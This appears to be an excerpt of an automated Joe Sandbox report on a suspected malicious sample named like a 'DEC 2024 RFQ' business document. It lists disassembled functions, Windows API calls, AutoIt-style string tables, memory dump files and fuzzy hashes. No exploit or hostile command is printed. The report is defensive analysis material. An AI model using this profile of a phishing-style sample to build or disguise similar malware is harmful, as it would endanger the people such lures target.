                                                                                                                      • Instruction Fuzzy Hash: D881C07150830A9FDB15DF50C881FAA7BE8EF85314F44C46AFD898A092DB38DD45CBA5
                                                                                                                      Function 0007ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                      • Opcode ID: 9800c7cfa264eab9fe148b432aeb46ae7546b15244e79e01b844f1f5bb519e36
                                                                                                                      • Instruction ID: 0d69178b3b79836612b192a73ebf3da67c7261d758de9267fe72c24c5f04d0ca
                                                                                                                      • Opcode Fuzzy Hash: 9800c7cfa264eab9fe148b432aeb46ae7546b15244e79e01b844f1f5bb519e36
                                                                                                                      • Instruction Fuzzy Hash: 14310430A48319BADA11EA54EE03EEE73A4AF51710F60402AF50D751D2FF656F04C66B
                                                                                                                      Function 00094FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00095013
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0009501E
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00095029
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00095034
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0009503F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0009504A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00095055
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00095060
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0009506B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00095076
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00095081
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0009508C
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00095097
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 000950A2
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 000950AD
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 000950B8
                                                                                                                      • GetCursorInfo.USER32(?), ref: 000950C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$Info
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2577412497-0
                                                                                                                      • Opcode ID: d533aa87cae1a618d5af2a965fe9dfc9ec99fe539bf26bcfd7faae3480003b8d
                                                                                                                      • Instruction ID: 68ceba28db5eea35fdf3fa7d8ebc25dc162e5e8be83c093f5048503a7dc8b3e1
                                                                                                                      • Opcode Fuzzy Hash: d533aa87cae1a618d5af2a965fe9dfc9ec99fe539bf26bcfd7faae3480003b8d
                                                                                                                      • Instruction Fuzzy Hash: 433107B1D487196ADF509FB68C899AFBFE8FF04750F50452AE50DE7280DA7865008F91
                                                                                                                      Function 000AA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000AA259
                                                                                                                      • DestroyWindow.USER32(?,?), ref: 000AA2D3
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000AA34D
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000AA36F
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000AA382
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 000AA3A4
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00020000,00000000), ref: 000AA3DB
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000AA3F4
                                                                                                                      • GetDesktopWindow.USER32 ref: 000AA40D
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000AA414
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000AA42C
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000AA444
                                                                                                                        • Part of subcall function 000225DB: GetWindowLongW.USER32(?,000000EB), ref: 000225EC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                      • Opcode ID: 6f1cf9e2fd89dec204dadec7ed74c910619d48c1e24ec364c7532c04dc81ef74
                                                                                                                      • Instruction ID: 0594ab93098a8965e450d6d9e0a5ef179e4a280885bdeb45b0e4f703fbbbfc4f
                                                                                                                      • Opcode Fuzzy Hash: 6f1cf9e2fd89dec204dadec7ed74c910619d48c1e24ec364c7532c04dc81ef74
                                                                                                                      • Instruction Fuzzy Hash: BD71BF71240645AFE721CF68CC48F6A77E5FB8E704F04492DF9859B2A1D774E902CB52
                                                                                                                      Function 000AC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 000AC627
                                                                                                                        • Part of subcall function 000AAB37: ClientToScreen.USER32(?,?), ref: 000AAB60
                                                                                                                        • Part of subcall function 000AAB37: GetWindowRect.USER32(?,?), ref: 000AABD6
                                                                                                                        • Part of subcall function 000AAB37: PtInRect.USER32(?,?,000AC014), ref: 000AABE6
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000AC690
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000AC69B
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000AC6BE
                                                                                                                      • _wcscat.LIBCMT ref: 000AC6EE
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000AC705
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000AC71E
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 000AC735
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 000AC757
                                                                                                                      • DragFinish.SHELL32(?), ref: 000AC75E
                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000AC851
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                      • API String ID: 169749273-3440237614
                                                                                                                      • Opcode ID: a8cd432b16548785874886670904bb19474d035dede8952943f504586bde2337
                                                                                                                      • Instruction ID: f80ce648cc2913cfa409e5411b2719112ac6a61f4ce1bc25323238c09e5db7ec
                                                                                                                      • Opcode Fuzzy Hash: a8cd432b16548785874886670904bb19474d035dede8952943f504586bde2337
                                                                                                                      • Instruction Fuzzy Hash: 73618E71108301AFD701EFA4DC85DAFBBF8EF89750F04092EF595961A2DB709949CBA2
                                                                                                                      Function 000A4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000A4424
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000A446F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                      • Opcode ID: d2ea11429155d7e81aa78130bd38f30c196fc5d8f75da6495f086d5928c2db4e
                                                                                                                      • Instruction ID: 41f8aa46736c08f7775484a0182a8b87c95c33fc2a16ba8e3a7492ebc6350c28
                                                                                                                      • Opcode Fuzzy Hash: d2ea11429155d7e81aa78130bd38f30c196fc5d8f75da6495f086d5928c2db4e
                                                                                                                      • Instruction Fuzzy Hash: A691C0746047119FCB04EF60C451AAEB7E1AF86350F04886DF8966B3A3CB74ED09CB96
                                                                                                                      Function 000AB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000AB8B4
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,000A6B11,?), ref: 000AB910
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000AB949
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000AB98C
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000AB9C3
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 000AB9CF
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000AB9DF
                                                                                                                      • DestroyIcon.USER32(?), ref: 000AB9EE
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000ABA0B
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000ABA17
                                                                                                                        • Part of subcall function 00042EFD: __wcsicmp_l.LIBCMT ref: 00042F86
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                      • Opcode ID: 6d1fdf6eec7bc128a1874e595541c6e4026973da7ac9c37cd0b10c6b0f868930
                                                                                                                      • Instruction ID: 1fa847888a62aa9d767bb931e2d0f276143e64bb51d6b4a88035d4cd9e93857e
                                                                                                                      • Opcode Fuzzy Hash: 6d1fdf6eec7bc128a1874e595541c6e4026973da7ac9c37cd0b10c6b0f868930
                                                                                                                      • Instruction Fuzzy Hash: BC61F071A00619BAEB14DFA4CC41FFE7BACEF0A721F104116FA15D61D2DB789990DBA0
                                                                                                                      Function 0008DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0008DCDC
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0008DCEC
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0008DCF8
                                                                                                                      • __wsplitpath.LIBCMT ref: 0008DD56
                                                                                                                      • _wcscat.LIBCMT ref: 0008DD6E
                                                                                                                      • _wcscat.LIBCMT ref: 0008DD80
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0008DD95
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DDA9
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DDDB
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DDFC
                                                                                                                      • _wcscpy.LIBCMT ref: 0008DE08
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0008DE47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                      • Opcode ID: 7eb133ac86f63e6d8e143b6afd0b2e1a7de1dc0112664921a3175b2415af3145
                                                                                                                      • Instruction ID: 2a7da156b933d2c1e69907878df2fba99cbad3b77b3a77a611c613713e93dc89
                                                                                                                      • Opcode Fuzzy Hash: 7eb133ac86f63e6d8e143b6afd0b2e1a7de1dc0112664921a3175b2415af3145
                                                                                                                      • Instruction Fuzzy Hash: F7616A725043069FCB10EF60D844AAEB3E8FF89310F04492EF999C7292DB35E945CB92
                                                                                                                      Function 00089C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00089C7F
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00089CA0
                                                                                                                      • __swprintf.LIBCMT ref: 00089CF9
                                                                                                                      • __swprintf.LIBCMT ref: 00089D12
                                                                                                                      • _wprintf.LIBCMT ref: 00089DB9
                                                                                                                      • _wprintf.LIBCMT ref: 00089DD7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 311963372-3080491070
                                                                                                                      • Opcode ID: df5cf51bf0816ed50ecedc71ea5f5322379f4a0d7ee534780b6a8732a0a8fdad
                                                                                                                      • Instruction ID: d3486ddd059ebf51118c13e134f68be2961da26d7b1eb8a32c0c6f14dd43e9f1
                                                                                                                      • Opcode Fuzzy Hash: df5cf51bf0816ed50ecedc71ea5f5322379f4a0d7ee534780b6a8732a0a8fdad
                                                                                                                      • Instruction Fuzzy Hash: B251917190061AAADF15FBE0DD86EFEB778AF04301F204065B609761A2EF352F58DB64
                                                                                                                      Function 0008A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0008A3CB
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 0008A418
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0008A460
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0008A497
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0008A4C5
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                      • Opcode ID: 275f10f4704b4ab945a9a127e802f299c97a6bbc6f7aae8148ea00e6a6e31a13
                                                                                                                      • Instruction ID: 28e944e6dcbd18d34233ab9863fe6e11f518b3906676b9a330e4c8a401656032
                                                                                                                      • Opcode Fuzzy Hash: 275f10f4704b4ab945a9a127e802f299c97a6bbc6f7aae8148ea00e6a6e31a13
                                                                                                                      • Instruction Fuzzy Hash: 92515F711043159FD700EF10D8919AAB3E4FF85718F14886EF89957262DB31ED09CB52
                                                                                                                      Function 0007F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0005E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0007F8DF
                                                                                                                      • LoadStringW.USER32(00000000,?,0005E029,00000001), ref: 0007F8E8
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,000E5310,?,00000FFF,?,?,0005E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0007F90A
                                                                                                                      • LoadStringW.USER32(00000000,?,0005E029,00000001), ref: 0007F90D
                                                                                                                      • __swprintf.LIBCMT ref: 0007F95D
                                                                                                                      • __swprintf.LIBCMT ref: 0007F96E
                                                                                                                      • _wprintf.LIBCMT ref: 0007FA17
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0007FA2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                      • API String ID: 984253442-2268648507
                                                                                                                      • Opcode ID: 15ef6270638478af99c0a12dc04b2b74b0cb975afacd5b1695fe3a838c0370b6
                                                                                                                      • Instruction ID: d592363bceddab95024dae95ba410d699441ebf99808291febc131c3bd47e6ab
                                                                                                                      • Opcode Fuzzy Hash: 15ef6270638478af99c0a12dc04b2b74b0cb975afacd5b1695fe3a838c0370b6
                                                                                                                      • Instruction Fuzzy Hash: E0411D7280421AAACF15FBE0ED86EFE7778AF14301F104065B609B6093EA356F49CB65
                                                                                                                      Function 0005A8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 884005220-0
                                                                                                                      • Opcode ID: 2f673c3a139f04b026a0b1e70999924886ded98dacfa1ca99c25a3eb63e5e743
                                                                                                                      • Instruction ID: 2e831082799beddae3b16d01ab6a3ab05cd1895d421ef98a7d239786a17cfe00
                                                                                                                      • Opcode Fuzzy Hash: 2f673c3a139f04b026a0b1e70999924886ded98dacfa1ca99c25a3eb63e5e743
                                                                                                                      • Instruction Fuzzy Hash: 826116B2A04211AFEB205F24DC457AF77E4EF02722F254769EC01AB192DB38C949C793
                                                                                                                      Function 000ABA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 000ABA56
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 000ABA6D
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 000ABA78
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000ABA85
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000ABA8E
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000ABA9D
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000ABAA6
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000ABAAD
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000ABABE
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,000B2CAC,?), ref: 000ABAD7
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000ABAE7
